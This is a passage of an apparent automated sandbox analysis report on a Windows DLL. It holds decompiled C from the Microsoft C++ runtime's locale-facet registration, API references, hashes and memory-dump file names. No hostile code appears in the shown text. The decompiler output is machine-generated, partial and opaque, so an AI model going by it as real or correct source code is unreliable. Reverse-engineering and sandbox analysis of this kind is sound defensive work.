																																																							_t878 =  *0x6d546dcc; // 0x0
																																																							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																							 *(_t902 - 0x10) = _t878;
																																																							_t514 = E6D46161C(0x6d546d80);
																																																							_t759 =  *((intOrPtr*)(_t902 + 8));
																																																							_t857 = E6D46171B( *((intOrPtr*)(_t902 + 8)), _t514);
																																																							__eflags = _t857;
																																																							if(_t857 != 0) {
																																																								L124:
																																																								E6D4866BA(_t902 - 0x14);
																																																								return E6D4A0075(_t857);
																																																							} else {
																																																								__eflags = _t878;
																																																								if(_t878 == 0) {
																																																									_push( *((intOrPtr*)(_t902 + 8)));
																																																									_push(_t902 - 0x10);
																																																									__eflags = E6D491558(_t637, _t759, _t838, _t857, _t878) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6D461438(_t902 - 0x20);
																																																										E6D4A3D74(_t902 - 0x20, 0x6d543504);
																																																										asm("int3");
																																																										E6D4A00AC(0x6d4e83cf, _t637, _t857, _t878, 0x14);
																																																										E6D486653(_t902 - 0x14, 0);
																																																										_t879 =  *0x6d546e00; // 0x0
																																																										 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																										 *(_t902 - 0x10) = _t879;
																																																										_t527 = E6D46161C(0x6d546dac);
																																																										_t766 =  *((intOrPtr*)(_t902 + 8));
																																																										_t858 = E6D46171B( *((intOrPtr*)(_t902 + 8)), _t527);
																																																										__eflags = _t858;
																																																										if(_t858 != 0) {
																																																											L131:
																																																											E6D4866BA(_t902 - 0x14);
																																																											return E6D4A0075(_t858);
																																																										} else {
																																																											__eflags = _t879;
																																																											if(_t879 == 0) {
																																																												_push( *((intOrPtr*)(_t902 + 8)));
																																																												_push(_t902 - 0x10);
																																																												__eflags = E6D4915C4(_t637, _t766, _t838, _t858, _t879) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6D461438(_t902 - 0x20);
																																																													E6D4A3D74(_t902 - 0x20, 0x6d543504);
																																																													asm("int3");
																																																													E6D4A00AC(0x6d4e83cf, _t637, _t858, _t879, 0x14);
																																																													E6D486653(_t902 - 0x14, 0);
																																																													_t880 =  *0x6d546dd0; // 0x0
																																																													 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																													 *(_t902 - 0x10) = _t880;
																																																													_t540 = E6D46161C(0x6d546d60);
																																																													_t773 =  *((intOrPtr*)(_t902 + 8));
																																																													_t859 = E6D46171B( *((intOrPtr*)(_t902 + 8)), _t540);
																																																													__eflags = _t859;
																																																													if(_t859 != 0) {
																																																														L138:
																																																														E6D4866BA(_t902 - 0x14);
																																																														return E6D4A0075(_t859);
																																																													} else {
																																																														__eflags = _t880;
																																																														if(_t880 == 0) {
																																																															_push( *((intOrPtr*)(_t902 + 8)));
																																																															_push(_t902 - 0x10);
																																																															__eflags = E6D49162A(_t637, _t773, _t838, _t859, _t880) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																_t777 = _t902 - 0x20;
																																																																E6D461438(_t777);
																																																																E6D4A3D74(_t902 - 0x20, 0x6d543504);
																																																																asm("int3");
																																																																E6D4A00AC(0x6d4e851f, _t637, _t859, _t880, 4);
																																																																_t881 = _t777;
																																																																 *(_t902 - 0x10) = _t881;
																																																																 *((intOrPtr*)(_t881 + 4)) =  *((intOrPtr*)(_t902 + 0xc));
																																																																_push( *((intOrPtr*)(_t902 + 0x14)));
																																																																_t287 = _t902 - 4;
																																																																 *_t287 =  *(_t902 - 4) & 0x00000000;
																																																																__eflags =  *_t287;
																																																																 *_t881 = 0x6d4ec0c4;
																																																																 *((char*)(_t881 + 0x28)) =  *((intOrPtr*)(_t902 + 0x10));
																																																																E6D49542F(_t637, _t777, _t838, _t859, _t881,  *_t287);
																																																																return E6D4A0075(_t881,  *((intOrPtr*)(_t902 + 8)));
																																																															} else {
																																																																_t859 =  *(_t902 - 0x10);
																																																																 *(_t902 - 0x10) = _t859;
																																																																 *(_t902 - 4) = 1;
																																																																E6D486FD3(__eflags, _t859);
																																																																 *0x6d4ea26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t859 + 4))))();
																																																																 *0x6d546dd0 = _t859;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t859 = _t880;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t858 =  *(_t902 - 0x10);
																																																													 *(_t902 - 0x10) = _t858;
																																																													 *(_t902 - 4) = 1;
																																																													E6D486FD3(__eflags, _t858);
																																																													 *0x6d4ea26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t858 + 4))))();
																																																													 *0x6d546e00 = _t858;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t858 = _t879;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t857 =  *(_t902 - 0x10);
																																																										 *(_t902 - 0x10) = _t857;
																																																										 *(_t902 - 4) = 1;
																																																										E6D486FD3(__eflags, _t857);
																																																										 *0x6d4ea26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t857 + 4))))();
																																																										 *0x6d546dcc = _t857;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t857 = _t878;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t856 =  *(_t902 - 0x10);
																																																							 *(_t902 - 0x10) = _t856;
																																																							 *(_t902 - 4) = 1;
																																																							E6D486FD3(__eflags, _t856);
																																																							 *0x6d4ea26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t856 + 4))))();
																																																							 *0x6d546dfc = _t856;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t856 = _t877;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t855 =  *(_t902 - 0x10);
																																																				 *(_t902 - 0x10) = _t855;
																																																				 *(_t902 - 4) = 1;
																																																				E6D486FD3(__eflags, _t855);
																																																				 *0x6d4ea26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t855 + 4))))();
																																																				 *0x6d546de0 = _t855;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t855 = _t876;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t854 =  *(_t902 - 0x10);
																																																	 *(_t902 - 0x10) = _t854;
																																																	 *(_t902 - 4) = 1;
																																																	E6D486FD3(__eflags, _t854);
																																																	 *0x6d4ea26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t854 + 4))))();
																																																	 *0x6d546ddc = _t854;
																																																	goto L103;
																																																}
																																															} else {
																																																_t854 = _t875;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t853 =  *(_t902 - 0x10);
																																														 *(_t902 - 0x10) = _t853;
																																														 *(_t902 - 4) = 1;
																																														E6D486FD3(__eflags, _t853);
																																														 *0x6d4ea26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t853 + 4))))();
																																														 *0x6d546db0 = _t853;
																																														goto L96;
																																													}
																																												} else {
																																													_t853 = _t874;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t852 =  *(_t902 - 0x10);
																																											 *(_t902 - 0x10) = _t852;
																																											 *(_t902 - 4) = 1;
																																											E6D486FD3(__eflags, _t852);
																																											 *0x6d4ea26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t852 + 4))))();
																																											 *0x6d546dd8 = _t852;
																																											goto L89;
																																										}
																																									} else {
																																										_t852 = _t873;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t851 =  *(_t902 - 0x10);
																																								 *(_t902 - 0x10) = _t851;
																																								 *(_t902 - 4) = 1;
																																								E6D486FD3(__eflags, _t851);
																																								 *0x6d4ea26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t851 + 4))))();
																																								 *0x6d546dc4 = _t851;
																																								goto L82;
																																							}
																																						} else {
																																							_t851 = _t872;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t850 =  *(_t902 - 0x10);
																																					 *(_t902 - 0x10) = _t850;
																																					 *(_t902 - 4) = 1;
																																					E6D486FD3(__eflags, _t850);
																																					 *0x6d4ea26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t850 + 4))))();
																																					 *0x6d546dc8 = _t850;
																																					goto L75;
																																				}
																																			} else {
																																				_t850 = _t871;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t849 =  *(_t902 - 0x10);
																																		 *(_t902 - 0x10) = _t849;
																																		 *(_t902 - 4) = 1;
																																		E6D486FD3(__eflags, _t849);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t849 + 4))))();
																																		 *0x6d546df4 = _t849;
																																		goto L68;
																																	}
																																} else {
																																	_t849 = _t870;
																																	goto L68;
																																}
																															}
																														} else {
																															_t848 =  *(_t902 - 0x10);
																															 *(_t902 - 0x10) = _t848;
																															 *(_t902 - 4) = 1;
																															E6D486FD3(__eflags, _t848);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t848 + 4))))();
																															 *0x6d546df8 = _t848;
																															goto L61;
																														}
																													} else {
																														_t848 = _t869;
																														goto L61;
																													}
																												}
																											} else {
																												_t847 =  *(_t902 - 0x10);
																												 *(_t902 - 0x10) = _t847;
																												 *(_t902 - 4) = 1;
																												E6D486FD3(__eflags, _t847);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t847 + 4))))();
																												 *0x6d546dc0 = _t847;
																												goto L54;
																											}
																										} else {
																											_t847 = _t868;
																											goto L54;
																										}
																									}
																								} else {
																									_t846 =  *(_t902 - 0x10);
																									 *(_t902 - 0x10) = _t846;
																									 *(_t902 - 4) = 1;
																									E6D486FD3(__eflags, _t846);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t846 + 4))))();
																									 *0x6d546df0 = _t846;
																									goto L47;
																								}
																							} else {
																								_t846 = _t867;
																								goto L47;
																							}
																						}
																					} else {
																						_t845 =  *(_t902 - 0x10);
																						 *(_t902 - 0x10) = _t845;
																						 *(_t902 - 4) = 1;
																						E6D486FD3(__eflags, _t845);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t845 + 4))))();
																						 *0x6d546dbc = _t845;
																						goto L40;
																					}
																				} else {
																					_t845 = _t866;
																					goto L40;
																				}
																			}
																		} else {
																			_t844 =  *(_t902 - 0x10);
																			 *(_t902 - 0x10) = _t844;
																			 *(_t902 - 4) = 1;
																			E6D486FD3(__eflags, _t844);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t844 + 4))))();
																			 *0x6d546dec = _t844;
																			goto L33;
																		}
																	} else {
																		_t844 = _t865;
																		goto L33;
																	}
																}
															} else {
																_t843 =  *(_t902 - 0x10);
																 *(_t902 - 0x10) = _t843;
																 *(_t902 - 4) = 1;
																E6D486FD3(__eflags, _t843);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t843 + 4))))();
																 *0x6d546db8 = _t843;
																goto L26;
															}
														} else {
															_t843 = _t864;
															goto L26;
														}
													}
												} else {
													_t842 =  *(_t902 - 0x10);
													 *(_t902 - 0x10) = _t842;
													 *(_t902 - 4) = 1;
													E6D486FD3(__eflags, _t842);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t842 + 4))))();
													 *0x6d546de8 = _t842;
													goto L19;
												}
											} else {
												_t842 = _t863;
												goto L19;
											}
										}
									} else {
										_t841 =  *(_t902 - 0x10);
										 *(_t902 - 0x10) = _t841;
										 *(_t902 - 4) = 1;
										E6D486FD3(__eflags, _t841);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t841 + 4))))();
										 *0x6d546dd4 = _t841;
										goto L12;
									}
								} else {
									_t841 = _t862;
									goto L12;
								}
							}
						} else {
							_t840 =  *(_t902 - 0x10);
							 *(_t902 - 0x10) = _t840;
							 *(_t902 - 4) = 1;
							E6D486FD3(__eflags, _t840);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t840 + 4))))();
							 *0x6d546db4 = _t840;
							goto L5;
						}
					} else {
						_t840 = _t861;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D48F03E
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F048
int.LIBCPMT ref: 6D48F05F

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

collate.LIBCPMT ref: 6D48F082
std::_Facet_Register.LIBCPMT ref: 6D48F099
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F0B9
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F0D7

Strings

hmTm, xrefs: 6D48F053

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID: hmTm
API String ID: 2363045490-1913511222
Opcode ID: bd2cfda2ab9f283f7f5c0571d0048292ddf74e608fb77f6b52eb74e2b24b3f6e
Instruction ID: fcb12c4c46bdb46650906af00e4b5aaf60407927893454ac5475d2c0e1eb9b22
Opcode Fuzzy Hash: bd2cfda2ab9f283f7f5c0571d0048292ddf74e608fb77f6b52eb74e2b24b3f6e
Instruction Fuzzy Hash: 7711E076C092699BCF01EBA0C844EEDB7B5AF91354F2A400CD611AB399DB71DD0187E2

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F0DD, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48F0DD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t279;
				signed int _t280;
				void* _t292;
				void* _t305;
				void* _t318;
				void* _t331;
				void* _t344;
				void* _t357;
				void* _t370;
				void* _t383;
				void* _t396;
				void* _t409;
				void* _t422;
				void* _t435;
				void* _t448;
				void* _t461;
				void* _t474;
				void* _t487;
				void* _t500;
				void* _t513;
				signed int _t739;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				signed int _t829;
				signed int _t830;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				void* _t858;

				_t797 = __edx;
				_t606 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t858 - 0x14, 0);
				_t819 =  *0x6d546dd4; // 0x0
				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
				 *(_t858 - 0x10) = _t819;
				_t279 = E6D46161C(0x6d546b28);
				_t609 =  *((intOrPtr*)(_t858 + 8));
				_t280 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t279);
				_t799 = _t280;
				if(_t280 != 0) {
					L5:
					E6D4866BA(_t858 - 0x14);
					return E6D4A0075(_t799);
				} else {
					if(_t819 == 0) {
						_push( *((intOrPtr*)(_t858 + 8)));
						_push(_t858 - 0x10);
						__eflags = E6D490E47(__ebx, _t609, __edx, _t799, _t819) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t858 - 0x20);
							E6D4A3D74(_t858 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t799, _t819, 0x14);
							E6D486653(_t858 - 0x14, 0);
							_t820 =  *0x6d546de8; // 0x0
							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
							 *(_t858 - 0x10) = _t820;
							_t292 = E6D46161C(0x6d546d94);
							_t616 =  *((intOrPtr*)(_t858 + 8));
							_t800 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t292);
							__eflags = _t800;
							if(_t800 != 0) {
								L12:
								E6D4866BA(_t858 - 0x14);
								return E6D4A0075(_t800);
							} else {
								__eflags = _t820;
								if(_t820 == 0) {
									_push( *((intOrPtr*)(_t858 + 8)));
									_push(_t858 - 0x10);
									__eflags = E6D490EB7(_t606, _t616, __edx, _t800, _t820) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t858 - 0x20);
										E6D4A3D74(_t858 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t606, _t800, _t820, 0x14);
										E6D486653(_t858 - 0x14, 0);
										_t821 =  *0x6d546db8; // 0x0
										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
										 *(_t858 - 0x10) = _t821;
										_t305 = E6D46161C(0x6d546d6c);
										_t623 =  *((intOrPtr*)(_t858 + 8));
										_t801 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t305);
										__eflags = _t801;
										if(_t801 != 0) {
											L19:
											E6D4866BA(_t858 - 0x14);
											return E6D4A0075(_t801);
										} else {
											__eflags = _t821;
											if(_t821 == 0) {
												_push( *((intOrPtr*)(_t858 + 8)));
												_push(_t858 - 0x10);
												__eflags = E6D490F1F(_t606, _t623, __edx, _t801, _t821) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t858 - 0x20);
													E6D4A3D74(_t858 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t606, _t801, _t821, 0x14);
													E6D486653(_t858 - 0x14, 0);
													_t822 =  *0x6d546dec; // 0x0
													 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
													 *(_t858 - 0x10) = _t822;
													_t318 = E6D46161C(0x6d546d98);
													_t630 =  *((intOrPtr*)(_t858 + 8));
													_t802 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t318);
													__eflags = _t802;
													if(_t802 != 0) {
														L26:
														E6D4866BA(_t858 - 0x14);
														return E6D4A0075(_t802);
													} else {
														__eflags = _t822;
														if(_t822 == 0) {
															_push( *((intOrPtr*)(_t858 + 8)));
															_push(_t858 - 0x10);
															__eflags = E6D490F87(_t606, _t630, _t797, _t802, _t822) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t858 - 0x20);
																E6D4A3D74(_t858 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t606, _t802, _t822, 0x14);
																E6D486653(_t858 - 0x14, 0);
																_t823 =  *0x6d546dbc; // 0x0
																 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																 *(_t858 - 0x10) = _t823;
																_t331 = E6D46161C(0x6d546d70);
																_t637 =  *((intOrPtr*)(_t858 + 8));
																_t803 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t331);
																__eflags = _t803;
																if(_t803 != 0) {
																	L33:
																	E6D4866BA(_t858 - 0x14);
																	return E6D4A0075(_t803);
																} else {
																	__eflags = _t823;
																	if(_t823 == 0) {
																		_push( *((intOrPtr*)(_t858 + 8)));
																		_push(_t858 - 0x10);
																		__eflags = E6D490FEF(_t606, _t637, _t797, _t803, _t823) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t858 - 0x20);
																			E6D4A3D74(_t858 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t606, _t803, _t823, 0x14);
																			E6D486653(_t858 - 0x14, 0);
																			_t824 =  *0x6d546df0; // 0x0
																			 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																			 *(_t858 - 0x10) = _t824;
																			_t344 = E6D46161C(0x6d546d9c);
																			_t644 =  *((intOrPtr*)(_t858 + 8));
																			_t804 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t344);
																			__eflags = _t804;
																			if(_t804 != 0) {
																				L40:
																				E6D4866BA(_t858 - 0x14);
																				return E6D4A0075(_t804);
																			} else {
																				__eflags = _t824;
																				if(_t824 == 0) {
																					_push( *((intOrPtr*)(_t858 + 8)));
																					_push(_t858 - 0x10);
																					__eflags = E6D491057(_t606, _t644, _t797, _t804, _t824) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t858 - 0x20);
																						E6D4A3D74(_t858 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t606, _t804, _t824, 0x14);
																						E6D486653(_t858 - 0x14, 0);
																						_t825 =  *0x6d546dc0; // 0x0
																						 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																						 *(_t858 - 0x10) = _t825;
																						_t357 = E6D46161C(0x6d546d74);
																						_t651 =  *((intOrPtr*)(_t858 + 8));
																						_t805 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t357);
																						__eflags = _t805;
																						if(_t805 != 0) {
																							L47:
																							E6D4866BA(_t858 - 0x14);
																							return E6D4A0075(_t805);
																						} else {
																							__eflags = _t825;
																							if(_t825 == 0) {
																								_push( *((intOrPtr*)(_t858 + 8)));
																								_push(_t858 - 0x10);
																								__eflags = E6D4910BF(_t606, _t651, _t797, _t805, _t825) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t858 - 0x20);
																									E6D4A3D74(_t858 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t606, _t805, _t825, 0x14);
																									E6D486653(_t858 - 0x14, 0);
																									_t826 =  *0x6d546df8; // 0x0
																									 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																									 *(_t858 - 0x10) = _t826;
																									_t370 = E6D46161C(0x6d546da4);
																									_t658 =  *((intOrPtr*)(_t858 + 8));
																									_t806 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t370);
																									__eflags = _t806;
																									if(_t806 != 0) {
																										L54:
																										E6D4866BA(_t858 - 0x14);
																										return E6D4A0075(_t806);
																									} else {
																										__eflags = _t826;
																										if(_t826 == 0) {
																											_push( *((intOrPtr*)(_t858 + 8)));
																											_push(_t858 - 0x10);
																											__eflags = E6D491127(_t606, _t658, _t797, _t806, _t826) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t858 - 0x20);
																												E6D4A3D74(_t858 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t606, _t806, _t826, 0x14);
																												E6D486653(_t858 - 0x14, 0);
																												_t827 =  *0x6d546df4; // 0x0
																												 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																												 *(_t858 - 0x10) = _t827;
																												_t383 = E6D46161C(0x6d546da0);
																												_t665 =  *((intOrPtr*)(_t858 + 8));
																												_t807 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t383);
																												__eflags = _t807;
																												if(_t807 != 0) {
																													L61:
																													E6D4866BA(_t858 - 0x14);
																													return E6D4A0075(_t807);
																												} else {
																													__eflags = _t827;
																													if(_t827 == 0) {
																														_push( *((intOrPtr*)(_t858 + 8)));
																														_push(_t858 - 0x10);
																														__eflags = E6D4911AB(_t606, _t665, _t797, _t807, _t827) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t858 - 0x20);
																															E6D4A3D74(_t858 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t606, _t807, _t827, 0x14);
																															E6D486653(_t858 - 0x14, 0);
																															_t828 =  *0x6d546dc8; // 0x0
																															 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																															 *(_t858 - 0x10) = _t828;
																															_t396 = E6D46161C(0x6d546d7c);
																															_t672 =  *((intOrPtr*)(_t858 + 8));
																															_t808 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t396);
																															__eflags = _t808;
																															if(_t808 != 0) {
																																L68:
																																E6D4866BA(_t858 - 0x14);
																																return E6D4A0075(_t808);
																															} else {
																																__eflags = _t828;
																																if(_t828 == 0) {
																																	_push( *((intOrPtr*)(_t858 + 8)));
																																	_push(_t858 - 0x10);
																																	__eflags = E6D491230(_t606, _t672, _t797, _t808, _t828) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D461438(_t858 - 0x20);
																																		E6D4A3D74(_t858 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e83cf, _t606, _t808, _t828, 0x14);
																																		E6D486653(_t858 - 0x14, 0);
																																		_t829 =  *0x6d546dc4; // 0x0
																																		 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																		 *(_t858 - 0x10) = _t829;
																																		_t409 = E6D46161C(0x6d546d78);
																																		_t679 =  *((intOrPtr*)(_t858 + 8));
																																		_t809 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t409);
																																		__eflags = _t809;
																																		if(_t809 != 0) {
																																			L75:
																																			E6D4866BA(_t858 - 0x14);
																																			return E6D4A0075(_t809);
																																		} else {
																																			__eflags = _t829;
																																			if(_t829 == 0) {
																																				_push( *((intOrPtr*)(_t858 + 8)));
																																				_push(_t858 - 0x10);
																																				__eflags = E6D4912B4(_t606, _t679, _t797, _t809, _t829) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D461438(_t858 - 0x20);
																																					E6D4A3D74(_t858 - 0x20, 0x6d543504);
																																					asm("int3");
																																					E6D4A00AC(0x6d4e83cf, _t606, _t809, _t829, 0x14);
																																					E6D486653(_t858 - 0x14, 0);
																																					_t830 =  *0x6d546dd8; // 0x0
																																					 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																					 *(_t858 - 0x10) = _t830;
																																					_t422 = E6D46161C(0x6d546d84);
																																					_t686 =  *((intOrPtr*)(_t858 + 8));
																																					_t810 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t422);
																																					__eflags = _t810;
																																					if(_t810 != 0) {
																																						L82:
																																						E6D4866BA(_t858 - 0x14);
																																						return E6D4A0075(_t810);
																																					} else {
																																						__eflags = _t830;
																																						if(_t830 == 0) {
																																							_push( *((intOrPtr*)(_t858 + 8)));
																																							_push(_t858 - 0x10);
																																							__eflags = E6D491339(_t606, _t686, _t797, _t810, _t830) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D461438(_t858 - 0x20);
																																								E6D4A3D74(_t858 - 0x20, 0x6d543504);
																																								asm("int3");
																																								E6D4A00AC(0x6d4e83cf, _t606, _t810, _t830, 0x14);
																																								E6D486653(_t858 - 0x14, 0);
																																								_t831 =  *0x6d546db0; // 0x0
																																								 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																								 *(_t858 - 0x10) = _t831;
																																								_t435 = E6D46161C(0x6d546d64);
																																								_t693 =  *((intOrPtr*)(_t858 + 8));
																																								_t811 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t435);
																																								__eflags = _t811;
																																								if(_t811 != 0) {
																																									L89:
																																									E6D4866BA(_t858 - 0x14);
																																									return E6D4A0075(_t811);
																																								} else {
																																									__eflags = _t831;
																																									if(_t831 == 0) {
																																										_push( *((intOrPtr*)(_t858 + 8)));
																																										_push(_t858 - 0x10);
																																										__eflags = E6D4913A1(_t606, _t693, _t797, _t811, _t831) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6D461438(_t858 - 0x20);
																																											E6D4A3D74(_t858 - 0x20, 0x6d543504);
																																											asm("int3");
																																											E6D4A00AC(0x6d4e83cf, _t606, _t811, _t831, 0x14);
																																											E6D486653(_t858 - 0x14, 0);
																																											_t832 =  *0x6d546ddc; // 0x0
																																											 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																											 *(_t858 - 0x10) = _t832;
																																											_t448 = E6D46161C(0x6d546d88);
																																											_t700 =  *((intOrPtr*)(_t858 + 8));
																																											_t812 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t448);
																																											__eflags = _t812;
																																											if(_t812 != 0) {
																																												L96:
																																												E6D4866BA(_t858 - 0x14);
																																												return E6D4A0075(_t812);
																																											} else {
																																												__eflags = _t832;
																																												if(_t832 == 0) {
																																													_push( *((intOrPtr*)(_t858 + 8)));
																																													_push(_t858 - 0x10);
																																													__eflags = E6D491409(_t606, _t700, _t797, _t812, _t832) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6D461438(_t858 - 0x20);
																																														E6D4A3D74(_t858 - 0x20, 0x6d543504);
																																														asm("int3");
																																														E6D4A00AC(0x6d4e83cf, _t606, _t812, _t832, 0x14);
																																														E6D486653(_t858 - 0x14, 0);
																																														_t833 =  *0x6d546de0; // 0x0
																																														 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																														 *(_t858 - 0x10) = _t833;
																																														_t461 = E6D46161C(0x6d546d8c);
																																														_t707 =  *((intOrPtr*)(_t858 + 8));
																																														_t813 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t461);
																																														__eflags = _t813;
																																														if(_t813 != 0) {
																																															L103:
																																															E6D4866BA(_t858 - 0x14);
																																															return E6D4A0075(_t813);
																																														} else {
																																															__eflags = _t833;
																																															if(_t833 == 0) {
																																																_push( *((intOrPtr*)(_t858 + 8)));
																																																_push(_t858 - 0x10);
																																																__eflags = E6D491471(_t606, _t707, _t797, _t813, _t833) - 0xffffffff;
